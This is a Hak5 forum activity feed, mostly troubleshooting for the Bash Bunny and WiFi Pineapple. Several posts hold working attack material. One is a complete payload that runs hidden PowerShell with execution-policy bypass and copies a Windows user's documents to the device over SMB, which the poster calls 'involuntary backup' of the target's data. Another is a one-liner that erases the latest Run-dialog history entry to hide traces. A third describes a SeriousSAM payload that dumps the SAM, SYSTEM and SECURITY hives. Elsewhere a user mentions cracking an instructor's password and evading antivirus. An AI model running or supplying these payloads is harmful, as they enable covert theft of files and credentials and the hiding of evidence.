Jump to content

All Activity

This stream auto-updates

  1. Past hour
  2. When the bunny is connected in arming mode, can you see the drive with "lsblk" or "fdisk -l"? What firmware version are you running?
  3. I haven't tried this, but I guess it could work on some routers at least? I'll give it a go once my new lab equipment arrives and I get it up and running again.
  4. Today
  5. Is there a glossary of commands for script writing. thanks
  6. Which Hak 5 product is best for accessing Mac computer running El capitan. Specifically trying to access the messaging app on the mac.
  7. Yesterday
  8. Hey @Darren Kitchen It is wonderful to see you are still highly active in the forums and everywhere within Hak5. I highly respect your character, attitude, personality, and intellect and how much you have accomplished in the pen-testing / cybersecurity world. Plus, your show is fantastic as well. Overall I have become a fanboy of Hak5, haha. So, first off, I should test this at home when I have the time, but hopefully, you can just possibly answer my question before I even get home. I have my BB Mark II plugged into my Kali Linux virtual machine on my work laptop in arming mode, and the interface seems to not detect it. Neither does it if I put it in Switch 1 or 2 with payloads using Ethernet/Mass Storage. Here is a link to an image of me attempting this on my lunch right now: https://imgur.com/gallery/3WifEOM Also, I have been given permission and authorization to test payloads on our machines at work. So, I have been looking out for new payloads, pull requests, and more on these forums, as well as payloads that work or ones that are obsolete since I have full access to Windows 10, Mac, Linux PCs, laptops, and all sorts of hardware and network switches, etc. As long as I do not leave the campus with sensitive data, I am fine. Anyway, I am using my Kali Linux VMware Workstation Pro 16 to arm payloads, write my own, use the BB Manager, and everything else with the Bash Bunny Mark II since I am mainly on Kali Linux anyway. Windows 10 loves to mark everything as a virus, and it is much easier to just use it in Linux for arming mode. I need to learn more about PowerShell and more so I can write some payloads that would be a great asset to the Hak5 community. I believe in everyone here as they all seem to be white hat pentesters and work hard to make this device and the rest so much better. I am a Frontend Web Designer & Developer but looking to get my OSCP certification and learn penetration testing in the meantime over these past 10 months or so but still new to it after nearly a year. Especially the password cracking but eventually figured it out in time to image all the computers in that cybersecurity classroom and move onto the next assignment for our IT Department, and the instructor is still unreachable. I managed to dump the credentials of our AC1-145 classroom at CCC, where I work in the Web Design/Marketing and IT Departments at my College. As much as I love designing web pages, web applications in Vue, React, and the triad of standards, I am just too passionate about pentesting and the Linux environment to ever give up on learning it. I hope to be a great asset to cybersecurity and the Hak5 forums and GitHub Repositories, etc. We needed to get the Onboard NIC password and eventually the instructor's station since he is on vacation until the campus is back open. We have been unsuccessful in contacting him still. Still, because I had the Bash Bunny Mark II, over 60 computers and students will have their computers ready to use next week for their cybersecurity courses. So, thank you for everything you have done in the cybersecurity community and world. I was able to get the password from the student's computers (Dell OptiPlex) which I never had attempted before but got it. Then, I was able to get the hash string and use Hashcat to get the instructor's password. Not only was it a wonderful learning experience and exciting, but I also was paid to do it since I was on the clock working that day. I hope to be helpful to Hak5, our community, and the cybersecurity community, in general, to make the online world safer as I learn more, but I need to get past some of these beginner hurdles first. My main questions are more than likely quite simple ones, but I am still learning the Bash Bunny Mark II, Ducky Language, Bash/Shell Payloads, Python (still find Vue/React easier somehow), and overall the Linux pentesting tools. I still struggle to find the correct listening port for Metasploit payloads and exploits and other simple pentesting tools, but overall I am here to learn and help eventually. I am going to finish my lunch and get back to work. Hopefully, I can figure out how to make the Internet connection sharing with the BB on Windows and Linux, keep testing older payloads and newer ones, write new ones, and help others that are contributing to the more recent payloads. I have found many of the payloads to not work that I want to get working again. Especially Browser Data and the credential ones. I noticed simple Sophos pre-installed antivirus software from our college to protect our machines from the BB, but I am trying to find ways around it, especially after finals are over this week. I also have a YouTube Channel I used to do gaming on but I might do some videos on the Bash Bunny Mark II once I learn it more but maybe a setup video? Thinking about it all and learning it all still though. https://www.youtube.com/c/ShadowGaming99
  9. What formatting process are you using?
  10. yes, I believe I ordered the wrong one from Amazon 😞 I can select the wlan3 interface for recon, but Pineap does not start so it's not working. I will get the proper supported adaptor
  11. As of now, most payloads simply remove the entire RunMRU history. This however may be noticed by a user that regularly uses the run dialog. Instead removing just the last entry can be done like so: #Remove latest run entry $p="HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU";$m="MRUList";$l=(gp $p).$m;rp $p $l[0];sp $p $m $l.SubString(1); Let's break it down: First we grab a list of all entries in RunMRU MRUList: $l=(gp $p).$m After this we remove the last entry by its key: rp $p $l[0] Finally we update the MRUList to omit the remove key: sp $p $m $l.SubString(1) gp -> Get-ItemProperty rp -> Remove-ItemProperty sp -> Set-ItemProperty I hope this can be useful to some of you. ~9o3 P.s. I shortened the snippet as much as possible, however it's still a good idea to include this in a second stage if possible.
  12. Then it's not an ACM but an AC. I would suggest to get one with a supported/preferred chipset (such as the ACM).
  13. ok, my bad. This adaptor uses a different chipset (Realtek 8812AU/8821A) I installed the firmware and driver from the packages in the UI and now I have WLAN3 Thanks!
  14. Bus 001 Device 004: ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 001 Device 003: ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter Bus 001 Device 007: ID 0bda:0811 Realtek Semiconductor Corp. Bus 001 Device 002: ID 1a40:0101 Terminus Technology Inc. Hub Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Sorry its the Alpha AWUS036ACS, not ACM
  15. No drivers should be needed. What's the output of lsusb? Is the ACM listed when it's attached?
  16. Hi All. I just got the AWUS036ACM but it does not show up on my pineapple mk7. Can anyone tell me the procedure to load the drivers / firmware? I am on 1.1.0 Beta 2 Thanks in advance
  17. No worries good sir, its all my pleasure - i enjoyed your code (it was handsome) so i wanted to include it in this thread as well! Its good to have different versions and approaches, that's how we improve! 🙂 (exe can run in cmd incase ps is blocked as an example). Your code teach me a lot so keep up the good stuff! Same to you!
  18. Hi Hitem, First off awesome that you also made a BB payload for the SeriousSAM vulnerability! If I had known you were also working on it I wouldn't have submitted my own payload. My apologies for that. I look forward to seeing what other payloads you'll create. ~9o3
  19. chrizree

    1.74 GB?

    As I said in the other post, is udisk mounted? Doesn't seem like that, which is correct behavior for the Mk2. Quoting the Docs: "By default in all switch positions the udisk is not mounted on the host (the Bash Bunny itself)." "The /root/udisk directory will appear blank unless `udisk mount` has been executed." It's all explained in the Docs https://docs.hak5.org/hc/en-us/articles/4402980129179-Bash-Bunny-Mark-II-Considerations
  20. GUHEVA

    1.74 GB?

    Hi everyone, I recently got my bashbunny MKII from amazon (store fonefunshop) and I noted that that the capacity for this is 1.74 GB (arming mode). Is that all the capacity for my BB? I know there is a slot for the sd card but what happens if I do not have one sd card and I want to run some payloads to copy some files, I think that is not space for just the BB and I saw some comments about it supposed to have 8 GB. Filesystem Size Used Avail Use% Mounted on /dev/root 3.2G 1.6G 1.5G 53% / devtmpfs 352M 0 352M 0% /dev tmpfs 502M 0 502M 0% /dev/shm tmpfs 502M 13M 489M 3% /run tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 502M 0 502M 0% /sys/fs/cgroup I hope you can help me. Regards.
  21. Jtyle6

    1.74 GB?

    Post in the right area of the forum... https://forums.hak5.org/forum/92-bash-bunny/
  22. GUHEVA

    1.74 GB?

    This is what it shows. Filesystem Size Used Avail Use% Mounted on /dev/root 3.2G 1.6G 1.5G 53% / devtmpfs 352M 0 352M 0% /dev tmpfs 502M 0 502M 0% /dev/shm tmpfs 502M 13M 489M 3% /run tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 502M 0 502M 0% /sys/fs/cgroup How can I mount the Udisk? I hope you can help me. Regards.
  23. Last week
  24. Hi guys! I just wanted to add that i did a PR to github and a few hours after me this gentleman did a *.exe-less version. Im posting it here to incase someone is interested! 🙂 Only reason for me to actually keep the *.exe in mine is purely to give credit where credit was due . Now you have both! Enjoy!
  25. Now you can involuntary backup more of the targets data by writing to the microSD card instead of the internal storage. Prerequisite: SSH or serial into your Bunny MK2 and do the following: 'timedatectl set-time' followed by the current year, month and date. Run: 'apt update ; apt install gcc' 'cd /tools' 'wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz' 'tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/' 'rm -f impacket-0.9.19.tar.gz' 'cd impacket' 'pip install -r requirements.txt' 'cd ../' 'mkdir tmp' 'cd tmp' 'pip2 install setuptools-rust' 'pip2 install cryptography' 'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg' 'rm -f pyans1-0.4.8-py2.7.egg' 'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz' 'tar -xzvf pycryptodomex-3.10.1.tar.gz' 'cd pycryptodomex-2.10.1 && python setup.py install' 'cd /tools/' 'rm -rf tmp/' 'cd impacket/ && python setup.py install' Now on your microSD card, create the following directory structure: /smb |___loot/ |___s.ps1 Copy the following payload.txt into either switch 1 or switch 2: ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Mound SD as udisk udisk mount ######## ETHERNET STAGE ######## LED STAGE1 ATTACKMODE RNDIS_ETHERNET # Start the SMB Server python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log & ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 GET HOST_IP LED STAGE2 ATTACKMODE HID RNDIS_ETHERNET RUN WIN powershell Q DELAY 1000 Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit" Q DELAY 500 Q ENTER LED SPECIAL # Wait until files are done copying while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE # Sync file system sync # Unmount the SD card udisk unmount ######## FINISH ######## # Trap is clean sync LED FINISH shutdown 0 Finally here is the s.ps1: $exfil_dir="$Env:UserProfile\Documents" $exfil_ext="*.docx" $exfil_ext1="*.pdf" $exfil_ext2="*.xlsx" $loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" mkdir $loot_dir robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue Now, eject the microSD card, insert into your Bunny MK2, move the switch to the one where the payload.txt is placed and insert it into a Windows 10 machine. If done correctly, it should exfiltrate all files specified in the s.ps1 script to the microSD card. 🙂
  26. Hi, I'm 9o3. I am a Solution Architect, Bug bounty hunter, programmer, and most of all a cyber security enthusiast. I love finding edge cases and finding ways to make machines do things they aren't supposed to. I look forward to getting to know all of you 🙂
  27. HiveNightmare for Bush Bunny Author: hitem Version: 1.0 Description Leverages the following exploit CVE-2021–36934 dubbed "SeriousSam". It uses a PoC-Tool by GosiTheDog. Targets Windows 10 Deploys in roughly 8-10 sec from plugin to execution completed Now you have SAM, SYSTEM and SECURITY in your loot folder! It clears some basic traces! (run/folder) Requirements Bash Bunny \o/ STATUS LED STATUS Purple Initializing Blue (blinking) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files to the switch you want em to be executed from (dont forget the *.exe from GossiTheDogs repository) Edit the Scripts to fit your deployment (*.ps1 switch path as an example) Eject the Bash Bunny and go ahead! Only known mitigation in my limited testing is "folder protection"-On by Windows Defender. I have also attached the /Mitigation/ possibility in the repository below for those who want to remedy this exploit via Bash Bunny. Download Click here to go to my github and download Note and Creds: I have owned a Bash Bunny MKII for 1 week, im completly new to this. SeriousSam however is "get it while its fresh" exploit and i wrote a simple Bash Bunny script and a powershellscript to leverage the GossiTheDog's PoC-tool. More info in the scripts!
  1. Load more activity
×
×
  • Create New...